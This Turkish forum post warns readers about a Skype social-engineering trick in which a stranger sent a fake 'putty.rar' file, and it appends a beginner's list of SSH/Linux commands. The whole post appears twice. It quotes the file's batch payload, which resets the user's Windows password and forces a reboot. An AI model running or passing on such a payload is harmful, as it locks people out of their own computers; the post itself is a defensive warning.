Pars Yazılım
Yasaklanmış
Merhaba beyler biraz önce bir hacker tarafından hacklenme girişimine uğradım ben belki bilirsiniz eski hacker olduğum için yemedim tabi ama eskilerden az buz bişey değildi arkadaşınki güzel bir yöntemdi ve bunu teknolijiyi çok iyi bilen bir kişi bile yiyebilirdi arkadaşın biri ekledi skype adresimden konuşmayı sizinle paylaşayım.
Monastery:sa
Ben:as
Monastery
utty anlar mısın hocam?
Ben:Birazda nerden tanışıyoruz noluyo direk mevzuya daldın.
Monastery:ben bi forumdan gördüm
Monastery
utty.rar adlı bir dosya attı dosyayı aldım ve inceledim
Attıgı dosyanın putty erişimi olmadıgını anladım ve açmadan konuşmaya devam ettim.
Monastery:ip : 172.228.64.75
Monastery : k.adı root
Monastery :şifre purrt555.
Ben:1 Dakka noluyoruz hocam hangi forum benden ne istiyorsun ?
Monastery :bende girmiyor putty
Ben:Telnet portları açık mı ? hangi işletim sistemi kullanıyorsun ?
Monastery :sizde bağlandımı hocam ? W7
Ben:Hayır bağlanmaz şuan oturduğum bilgisayar olduğu için güvenlik duvarları v.b yüzünden her türlü dış bağlantı engelli Win7 güvenlik duvarını kapatmanızı portlarınızı gözden geçirmenizi öneririm hangi forumdan gördüğünü hala söylemediniz bu arada
Monastery : bi denermisin
Monastery : ya
Monastery : merak ettim
Ben:Yok merak etmeyin
Sonra dosyayı rardan çıkarıp inceledim.
net user %username% 123456
shutdown -r
kodunu içeriyordu bunu açtığınızda ne olur peki bu kod ne anlama gelir.
Cmd'yi açıp kullanıcınızı şifreler verilen şifreyle ve bilgisayarı hiç birşey sormadan kapatır.
Arkadaş sanırım acemi biriydiki zor bir şifre koymamıştı koysaydı ne olurdu bilgisayarı açardınız şifreli odluğunu görürdünüz dener dener giremezdiniz sonra format atmak zorunda kalırdınız tüm dosyalarınız v.b giderdi arkadaş eğer profosyonel biriyse siz bu şifreyi bulup girdiğinizde Linux yardımıyla bilgisayarınıza girerdi büyük ihtimal zaten skype'de konuşurken ip adresinizi tespit etmişti kullanıcı adı şifre v.b bilgileride biliyordu herşey elindeydi girerdi tüm dosyalarınıza erişirdi isterse bütün dosyaları kendi bilgisayarına kopyalar veya masaüstünüze birşeyler yerleştirirdi bu yöntemle size virüs yedirip bilgisayarında tam yetkiye sahip olurdu.Ondan sonra size ne yapacağı kardışıdaki Hackerın vicdanına kalırdı.
Ben eski hacker olduğum için hiç bir hasar almadan bu işten kurtuldum sizede bilgilendirmek için bu yazıyı yazdım kimseden bir sosmal medya sisteminde dosya alıp vermeyin en yakınınız biri bile olsa çünkü hacker sizi avlamak için daha önce arkadaşınızı avlamış olabilir.Skype facebook gibi yerlerden tanımadıgınız kişileri eklemeyin eklemenizle bile hacker sizinle ilgili bir çok bilgiye sahip olabilir.
Okuduğunuz için teşekkürler iyi günler dilerim.
Dipnot
SSH Putty hakkında bilgi:
SSH, Telnet ve rlogin gibi ağ üzerindeki başka bir sunucuya uzakta bulunan bir başka makineden bağlantı sağlayan bir protokoldür.
SSH açık haliyle Secure Shell yani güvenli kabuk anlamına gelir. Telnet ve rlogin kullanıcı şifreleri dahil tüm iletişim açık yani şifrelenmeden gerçekleştirilirken, SSH güvensiz makineler arasındaki iletişimi güçlü bir kripto yöntemiyle şifreler.
SSH ile bağlantının gerçekleştirilebilmesi için Telnet bölümünde de anlattığımız üzere bağlanılmak istenen sunucu makinede bir kullanıcı hesabının ve kullanıcı şifresinin bulunması gereklidir.
Bunların dışında birde SSH istemci programlarından birine ihtiyacımız olacaktır. SSH ile bir bilgisayara bağlanabilmek için kullanıcı, öncelikle kimliğini ispatlayabilmelidir.
Bağlantıdan sonra kullanacağınız bazı komutlar.
ls
Kullanımı: ls
Açıklaması: Dizindeki dosya veya klasörleri görmenizi sağlar.
cd
Kullanımı: cd dosya
Açıklaması: her hangi bir klasöre girmeyi sağlar
cd ..
Kullanımı: cd ..
Açıklaması: Bir üst dizine geçmenizi sağlar.
pico
Kullanımı: pico dosya.conf , pico dosya.txt
Açıklaması: Her hangi bir dosyanın içeriğini görmeye yarar. İçeriğini açtığınız dosya üzerinde değişiklik yapabilirsiniz. pico kurulu olmayan server'larda nano kullanılır. Dosya içinde her hangi bir değişiklik yaptığınızda ctrl+x e basıp "y" tuşuna basarak enterlamanız yeterli olur. "y" değişiklikleri kaydet, "n" değişiklikleri kaydetme.
cp
Kullanımı: cp kopyalanacak-dosya kopyalanacak-dizin
Açıklaması: her hangi bir dizin veya dosya kopyalama olanağı sağlar.
mkdir
Kullanımı: mkdir klasör-adı
Açıklaması: Klasör (dizin) oluşturmanızı sağlar.
rmdir
Kullanımı: rmdir klasör-adı
Açıklaması: Klasör (dizin) silmenizi sağlar.
rm -r
Kullanımı: rm -r dosya.txt
Açıklaması: dosya silmek için kullanılır.
rm -Rf
Kullanımı: rm -Rf dizin
Açıklaması: Dizindeki tüm dosyaları siler.
Kullanımı: top
Açıklaması: Sistem kullanımını gösterir. CPU ram vs. (Rootlar kullanabilir.)
Dosya Sıkıştırmak
Kullanımı: tar cvzf dosyam.tar.gz sıkıştırılacak-dosya
Açıklaması: Komut dosya sıkıştırmaya yarar. bu formatta sıkıştıracağınız dosyanızın adı dosyam.tar.gz olacaktır.
Sıkıştırılan Dosyayı Açmak
Kullanımı: tar -zxvf dosyam.tar.gz
Açıklaması: Bu şekilde sıkıştırmış olduğunuz dosyanızı açabilirsiniz.
Unzip
Kullanımı: unzip dosya.zip
Açıklaması: Zip ile sıkıştırılmış dosyalarınızı açmanızı sağlar.
wget
Kullanımı: wget http://www.site.com/dosya.zip
Açıklaması: Hızlı bir şekilde hostunuza dosya aktarmanızı sağlar.
whois
Kullanımı: whois domain.com
Açıklaması: Her hangi bir site adresi kullanmadan bu program ile çok kolay ve hızlı bir şekilde domain'lere whois çekebilirsiniz.
Monastery:sa
Ben:as
Monastery
Ben:Birazda nerden tanışıyoruz noluyo direk mevzuya daldın.
Monastery:ben bi forumdan gördüm
Monastery
Attıgı dosyanın putty erişimi olmadıgını anladım ve açmadan konuşmaya devam ettim.
Monastery:ip : 172.228.64.75
Monastery : k.adı root
Monastery :şifre purrt555.
Ben:1 Dakka noluyoruz hocam hangi forum benden ne istiyorsun ?
Monastery :bende girmiyor putty
Ben:Telnet portları açık mı ? hangi işletim sistemi kullanıyorsun ?
Monastery :sizde bağlandımı hocam ? W7
Ben:Hayır bağlanmaz şuan oturduğum bilgisayar olduğu için güvenlik duvarları v.b yüzünden her türlü dış bağlantı engelli Win7 güvenlik duvarını kapatmanızı portlarınızı gözden geçirmenizi öneririm hangi forumdan gördüğünü hala söylemediniz bu arada
Monastery : bi denermisin
Monastery : ya
Monastery : merak ettim
Ben:Yok merak etmeyin
Sonra dosyayı rardan çıkarıp inceledim.
net user %username% 123456
shutdown -r
kodunu içeriyordu bunu açtığınızda ne olur peki bu kod ne anlama gelir.
Cmd'yi açıp kullanıcınızı şifreler verilen şifreyle ve bilgisayarı hiç birşey sormadan kapatır.
Arkadaş sanırım acemi biriydiki zor bir şifre koymamıştı koysaydı ne olurdu bilgisayarı açardınız şifreli odluğunu görürdünüz dener dener giremezdiniz sonra format atmak zorunda kalırdınız tüm dosyalarınız v.b giderdi arkadaş eğer profosyonel biriyse siz bu şifreyi bulup girdiğinizde Linux yardımıyla bilgisayarınıza girerdi büyük ihtimal zaten skype'de konuşurken ip adresinizi tespit etmişti kullanıcı adı şifre v.b bilgileride biliyordu herşey elindeydi girerdi tüm dosyalarınıza erişirdi isterse bütün dosyaları kendi bilgisayarına kopyalar veya masaüstünüze birşeyler yerleştirirdi bu yöntemle size virüs yedirip bilgisayarında tam yetkiye sahip olurdu.Ondan sonra size ne yapacağı kardışıdaki Hackerın vicdanına kalırdı.
Ben eski hacker olduğum için hiç bir hasar almadan bu işten kurtuldum sizede bilgilendirmek için bu yazıyı yazdım kimseden bir sosmal medya sisteminde dosya alıp vermeyin en yakınınız biri bile olsa çünkü hacker sizi avlamak için daha önce arkadaşınızı avlamış olabilir.Skype facebook gibi yerlerden tanımadıgınız kişileri eklemeyin eklemenizle bile hacker sizinle ilgili bir çok bilgiye sahip olabilir.
Okuduğunuz için teşekkürler iyi günler dilerim.
Dipnot
SSH Putty hakkında bilgi:
SSH, Telnet ve rlogin gibi ağ üzerindeki başka bir sunucuya uzakta bulunan bir başka makineden bağlantı sağlayan bir protokoldür.
SSH açık haliyle Secure Shell yani güvenli kabuk anlamına gelir. Telnet ve rlogin kullanıcı şifreleri dahil tüm iletişim açık yani şifrelenmeden gerçekleştirilirken, SSH güvensiz makineler arasındaki iletişimi güçlü bir kripto yöntemiyle şifreler.
SSH ile bağlantının gerçekleştirilebilmesi için Telnet bölümünde de anlattığımız üzere bağlanılmak istenen sunucu makinede bir kullanıcı hesabının ve kullanıcı şifresinin bulunması gereklidir.
Bunların dışında birde SSH istemci programlarından birine ihtiyacımız olacaktır. SSH ile bir bilgisayara bağlanabilmek için kullanıcı, öncelikle kimliğini ispatlayabilmelidir.
Bağlantıdan sonra kullanacağınız bazı komutlar.
ls
Kullanımı: ls
Açıklaması: Dizindeki dosya veya klasörleri görmenizi sağlar.
cd
Kullanımı: cd dosya
Açıklaması: her hangi bir klasöre girmeyi sağlar
cd ..
Kullanımı: cd ..
Açıklaması: Bir üst dizine geçmenizi sağlar.
pico
Kullanımı: pico dosya.conf , pico dosya.txt
Açıklaması: Her hangi bir dosyanın içeriğini görmeye yarar. İçeriğini açtığınız dosya üzerinde değişiklik yapabilirsiniz. pico kurulu olmayan server'larda nano kullanılır. Dosya içinde her hangi bir değişiklik yaptığınızda ctrl+x e basıp "y" tuşuna basarak enterlamanız yeterli olur. "y" değişiklikleri kaydet, "n" değişiklikleri kaydetme.
cp
Kullanımı: cp kopyalanacak-dosya kopyalanacak-dizin
Açıklaması: her hangi bir dizin veya dosya kopyalama olanağı sağlar.
mkdir
Kullanımı: mkdir klasör-adı
Açıklaması: Klasör (dizin) oluşturmanızı sağlar.
rmdir
Kullanımı: rmdir klasör-adı
Açıklaması: Klasör (dizin) silmenizi sağlar.
rm -r
Kullanımı: rm -r dosya.txt
Açıklaması: dosya silmek için kullanılır.
rm -Rf
Kullanımı: rm -Rf dizin
Açıklaması: Dizindeki tüm dosyaları siler.
Kullanımı: top
Açıklaması: Sistem kullanımını gösterir. CPU ram vs. (Rootlar kullanabilir.)
Dosya Sıkıştırmak
Kullanımı: tar cvzf dosyam.tar.gz sıkıştırılacak-dosya
Açıklaması: Komut dosya sıkıştırmaya yarar. bu formatta sıkıştıracağınız dosyanızın adı dosyam.tar.gz olacaktır.
Sıkıştırılan Dosyayı Açmak
Kullanımı: tar -zxvf dosyam.tar.gz
Açıklaması: Bu şekilde sıkıştırmış olduğunuz dosyanızı açabilirsiniz.
Unzip
Kullanımı: unzip dosya.zip
Açıklaması: Zip ile sıkıştırılmış dosyalarınızı açmanızı sağlar.
wget
Kullanımı: wget http://www.site.com/dosya.zip
Açıklaması: Hızlı bir şekilde hostunuza dosya aktarmanızı sağlar.
whois
Kullanımı: whois domain.com
Açıklaması: Her hangi bir site adresi kullanmadan bu program ile çok kolay ve hızlı bir şekilde domain'lere whois çekebilirsiniz.